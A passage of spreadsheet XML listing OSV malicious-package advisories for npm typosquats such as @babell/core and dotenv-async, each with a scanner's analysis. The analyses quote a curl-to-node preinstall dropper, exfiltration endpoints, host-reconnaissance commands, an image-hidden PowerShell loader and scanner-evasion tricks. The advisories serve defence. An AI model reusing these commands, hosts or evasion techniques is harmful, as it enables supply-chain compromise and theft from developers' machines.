          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7ebb04f93b463536e56e0160e0e1fc2748d69c9eb15f991e990365cee7852a34)
The package.json preinstall script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching JavaScript from an unrelated third-party host (gitflic.ru, proxied via web.archive.org) and piping it directly into node at `npm install` time. The fetch is unpinned, has no integrity or signature check, and the source is attacker-controlled and mutable. The scoped name `@angulra/core` resembles Angular ecosystem names while the package description (`Core Libs`) and dependency set (mysql, pg, redis, knox, amqp) are inconsistent with any coherent library purpose, consistent with a typosquat lure. Any environment running `npm install` on this package executes arbitrary remote code with the installing user's privileges.
</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17496</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17497</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="inlineStr"/>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>npm:@babell/core</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr"/>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ae256b9ff55b98040ea9cb6561edfe1c4e2db94bd111fb19a449651bd6b5d44b)
The package's package.json defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading a JavaScript file from a third-party host (gitflic.ru/hellscripter, fetched through web.archive.org) and piping it directly into Node for execution at install time. The content fetched is unpinned, served from a non-publisher host unrelated to Babel, and executed with the privileges of the installing user. The package name `@babell/core` differs from the legitimate `@babel/core` by a single character, and its description, author, repository, homepage, and README all impersonate the real Babel project, serving as a delivery vehicle for the dropper.
</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17497</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17498</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="inlineStr"/>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>npm:@kibt/www-nuxt-i18n</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr"/>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5ab1895c73507311b9efd31e40015529d9d7735c87e50cf3b714e6e520205ec4)
The package is a stub whose index.js exports a Proxy returning no-op functions for every property access, allowing bundlers that import any member of the expected real package to succeed. The package.json declares a postinstall script `node beacon.cjs`, and index.js also loads the same beacon at require() time. beacon.cjs collects installer host metadata — os.hostname(), the install directory (__dirname), process.cwd(), and process.version — and POSTs it to the hardcoded plain-HTTP bare-IP endpoint http://185.158.107.175:8787/_ah/dc. The destination is not affiliated with any legitimate publisher, the package provides no real functionality, and an in-source comment frames successful installs as evidence of a hit — matching the canonical dependency-confusion / namesquat validator shape where host identity is reported back to the operator to confirm which internal environments resolved the attacker-controlled scoped name.
</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17498</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17499</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="inlineStr"/>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>npm:@nagular/core</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr"/>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557)
The package's package.json declares a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from an unrelated third-party host (gitflic.ru proxied through web.archive.org) and piping it directly to node for execution during `npm install`. The remote content runs with the installer's privileges before any package code is imported or reviewed, giving whoever controls that URL arbitrary code execution on every machine that installs the package. The remote path `hellscripter/install-scripts` and the use of an archive proxy are consistent with a hostile dropper rather than a legitimate build step. The scope name `@nagular/core` additionally resembles the Angular ecosystem (`@angular`), consistent with a typosquat lure, and the preinstall hook is the package's only functional content.
</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17500</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="inlineStr"/>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>npm:@nagular/router</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr"/>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5db05365620b3f716b28b41577e593bc35a6699aee20090951158c206c2585ca)
package.json declares a preinstall lifecycle hook that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque JavaScript payload from an unrelated third-party repository (gitflic.ru/hellscripter/install-scripts) proxied via web.archive.org and piping it directly into node at `npm install` time. The fetched bytes are not pinned by hash or version, the host is unrelated to the declared repository (pillarjs/router) or publisher domain (somethingdoug.com), and execution happens automatically with full user privileges on every install. Package metadata further impersonates the maintainer of the legitimate pillarjs/router package (author: Douglas Christopher Wilson) and uses the scope `@nagular/router`, a name likely to be confused with `@angular/router`, consistent with a typosquat lure designed to trick installers into running the preinstall dropper.
</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17500</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17501</t>
        </is>
      </c>
      <c r="D35" s="5" t="inlineStr"/>
      <c r="E35" s="5" t="inlineStr"/>
      <c r="F35" s="5" t="inlineStr"/>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr">
        <is>
          <t>npm:a11y-tabindex-manager</t>
        </is>
      </c>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr"/>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ce127c3e1cadd4f544a5f2580f2db030e3d9e3667d7b0e3399d85b59eb354045)
a11y-tabindex-manager ships thunderboltRegistry.js, which executes an IIFE on module load that runs a series of local shell commands (cat /etc/hosts, whoami, id, pwd, ifconfig/ip addr, hostname, cat /etc/resolv.conf, uname -a, env | head -50) via child_process.execSync and POSTs each output over plain HTTP to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. A separate beacon labeled 'rce-poc-v3' sends Node.js version, platform, and PID to the same host. child_process is acquired both directly and via a fallback that instantiates a new Module (new module.constructor()) and copies module.paths — an evasion technique to bypass simple require('child_process') scans. The package name resembles a generic accessibility helper, but the shipped registry entry performs host identity, network configuration, user, and environment-variable harvesting with no legitimate purpose.
</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17501</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17502</t>
        </is>
      </c>
      <c r="D36" s="5" t="inlineStr"/>
      <c r="E36" s="5" t="inlineStr"/>
      <c r="F36" s="5" t="inlineStr"/>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr">
        <is>
          <t>npm:botmaker-cli</t>
        </is>
      </c>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr"/>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (86fdc86c67d202ca9938942ef7786534d1b72169187cce13b1cefd8899fa54aa)
On npm install, postinstall.js collects the installer's hostname, username, current working directory, architecture, platform, and network interface list (including private IPs) and POSTs them as JSON to the hardcoded host telemetry-edge.net at /api/v1/telemetry over HTTPS with certificate validation disabled (rejectUnauthorized: false). The same postinstall script reads the HTTP response body, parses it as JSON, and passes the response's `exec` field to child_process.execSync with a 30-second timeout, granting whoever controls telemetry-edge.net arbitrary shell command execution as the installing user on every machine that runs `npm install`. The package's index.js is an inert stub containing only `module.exports = { version: '0.1.19' }` and a comment directing users to a different scoped package (`@botmaker.org/botmaker-cli`), indicating this unscoped name is a lookalike lure whose sole operative payload is the install-time beacon-and-exec channel.
</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17502</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17503</t>
        </is>
      </c>
      <c r="D37" s="5" t="inlineStr"/>
      <c r="E37" s="5" t="inlineStr"/>
      <c r="F37" s="5" t="inlineStr"/>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr">
        <is>
          <t>npm:dom-focus-sentinel</t>
        </is>
      </c>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr"/>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7baf5178b3cd02ae8e6e2c01e8cf305fd9670118428c4d3ef94ac0caef6fc4e8)
thunderboltRegistry.js runs an immediately-invoked function at module load that uses child_process.execSync to run host reconnaissance commands (whoami, id, pwd, ifconfig, ip addr, cat /etc/hosts, hostname) and transmits each command's output, along with Node version, platform, and pid, via fetch GET requests to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package also structurally impersonates Wix internal registry modules by exporting factories keyed on thunderboltRegistry/siteAssetsRegistry/documentManagementRegistry/editorRegistry/corvidRegistry and shipping a manifest with static.parastorage.com unpkg URLs under dom-focus-sentinel@1.0.0, so the exfiltration IIFE fires whenever a consumer requires any of these registry names. The reconnaissance behavior is unrelated to the declared focus-sentinel purpose, and a `beacon=rce-poc` marker is embedded in the exfil traffic.
</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17503</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17504</t>
        </is>
      </c>
      <c r="D38" s="5" t="inlineStr"/>
      <c r="E38" s="5" t="inlineStr"/>
      <c r="F38" s="5" t="inlineStr"/>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-async</t>
        </is>
      </c>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr"/>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (51d22963a1f1fabe3a8b3f54efcb5053761d385486093200765745297ac2bd16)
The package impersonates the dotenv API but on module load (and again when the bundled CLI runs) invokes a function named dispatchAnalytics in dist/index.cjs that extracts a payload from the APP14 (0xFFED) marker of dist/stest.jpg. The extracted UTF-16LE base64 string is assembled into a VBS file (relay_&lt;time&gt;&lt;rand&gt;.vbs) in the OS temp directory that invokes powershell.exe with -NoProfile -NonInteractive -EncodedCommand, spawned via wscript.exe in detached, windowsHide mode. The decoded PowerShell downloads a second-stage Windows executable from hardwood-studio-obviously-briefing.trycloudflare.com/download/winhost and executes it, giving arbitrary code execution on Windows installers. String-splitting of powershell/wscript and argument tokens is used to evade static matching. A second obfuscated execution vehicle is shipped in dist/enterprise.js: a hex-named obfuscator.io-style loader that RC4-decrypts a base64 blob and executes it via new Function(require, module, __filename, __dirname, &lt;decoded&gt;); this file is not referenced by index.cjs in the current build but is a dormant secondary stage in the tarball. Identity inconsistencies corroborate intent: cli.cjs bundles an inner package.json declaring name node-env-buffer version 2.2.6 while the outer manifest is dotenv-async 1.0.0, and the README points at the unrelated motdotla/dotenv project.
</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17504</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17505</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr"/>
      <c r="F39" s="5" t="inlineStr"/>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>npm:dotenv-promises</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr"/>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (254f0bcbb8014fb07414eb0b41a898deac682aa8c8b7a8541a0f7538ac274f9a)
The package is published as 'dotenv-promises' but its bundled manifest declares the internal name 'node-env-buffer@2.2.6' and mimics the dotenv API (config/parse/populate/expand) to attract installs of a well-known library. On require of the main entry (dist/index.cjs) and on load of the CLI (dist/cli.cjs), a top-level call to dispatchAnalytics() reads a bundled JPEG at dist/stest.jpg, extracts bytes from the image's APP13 (marker 0xED) segment, writes a randomized 'relay_*.vbs' script into the OS temp directory that invokes powershell.exe with -NoProfile -NonInteractive -EncodedCommand using the extracted string as the payload, and spawns wscript.exe detached with windowsHide:true to run the VBS hidden; the VBS self-deletes after execution. Strings such as 'powershell.exe', 'wscript.exe', '-NoProfile', and '-EncodedCommand' are split and concatenated at runtime to evade static scanners, and a second bundle (dist/enterprise.js) is heavily obfuscated (string-array shift, while(!![]) control-flow flattening). No signature or hash check is performed on the JPEG-embedded payload, giving the publisher arbitrary code execution on any Windows host that installs or imports the package.
</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17505</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17506</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr"/>
      <c r="F40" s="5" t="inlineStr"/>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-ftp</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5e916c23a0efbd49d3cfcd5993957df7afbade3f454925d0672acc8c9f68245c)
The package's declared main entry index.js unconditionally requires./lib/config, a 4,499,968-byte obfuscator.io-packed file (26,234-entry string array, hex-renamed identifiers, control-flow flattening, top-level IIFE) that executes as soon as any consumer runs `require('hardhat-ftp')`. After string-array decoding the loader resolves to execSync and spawn sinks, and the package declares axios as a dependency, giving the import-time payload both outbound HTTP and local command-execution primitives with the concrete command targets concealed behind the obfuscation. The surrounding package is a cover: it is published under the name hardhat-ftp with a vulnerability-management description, but the README headers, badges, and ecosystem links are lifted from pinojs/pino, and the files under lib/ (proto.js, levels.js, transport.js, multistream.js) mirror the pino source tree. The name/README/code mismatch, the scale of the obfuscation, and the presence of exec+HTTP primitives inside the auto-loaded module match the masquerade-dropper pattern: installing or requiring this package triggers execution of concealed attacker-controlled code on the installer's host.
</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17506</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17507</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="inlineStr"/>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-jsx</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (62ac44be2745338b73861690e7f979216fdfc6c3797dfa2f450e9063aa4158d1)
The package is published as 'hardhat-jsx' but its metadata, documentation, and lib/ layout impersonate the pino logger (keywords 'fast','logger','stream','json'; shipped docs reference pinojs/pino). The main entry index.js unconditionally requires./lib/config, which is a 4,499,968-byte single-line obfuscator.io artifact — a hex-escaped string array of ~26,234 entries with string-array rotation and control-flow flattening (22,707 decoder-wrapper inlines, 44,499 string-inline changes). A legitimate pino 'config' module is ~1-2KB; a multi-megabyte obfuscated blob auto-loaded by the main entry is a loader/dropper. The surface index.js exports a no-op Express-style middleware whose comment claims it 'triggers a background process', providing a cover story adjacent to the obfuscated require. Loading the package via require/import executes the opaque payload in the installer's process. The name/content mismatch (hardhat-jsx vs. pino impersonation), the stub façade, and the heavily obfuscated auto-loaded module together form a trojan-package shape.
</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17507</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17508</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="inlineStr"/>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-plus</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02d908da8470ad86669b080d267b57174ccd77e5fd6ed2c371c430d98e869f2b)
hardhat-plus@2.21.0 is published under a name resembling the Ethereum development tool 'hardhat' but ships README, type definitions, and docs copied verbatim from the unrelated pino logger project (README.md references npmjs.com/package/pino; index.d.ts references github.com/pinojs/pino.git; package.json description is unrelated boilerplate). The package's main entry index.js requires./lib/config, which is a single ~4.5MB heavily obfuscated file using obfuscator.io transforms: hex-named identifiers, a self-mutating shuffled string-array (while(!![]){...f['push'](f['shift']())}), control-flow flattening, dispatched decode helpers, and pervasive \xNN escape literals. This opaque code runs unconditionally the moment the package is imported. There is no legitimate source, minification story, or documented purpose that accounts for a multi-megabyte obfuscated blob being loaded as a 'config' module in a package that presents itself as either a Hardhat plugin or a pino logger. The combination of name-based impersonation, mismatched cover-story documentation, and an obfuscated payload auto-executed on import is the standard delivery shape for supply-chain malware.
</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17508</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17509</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="inlineStr"/>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
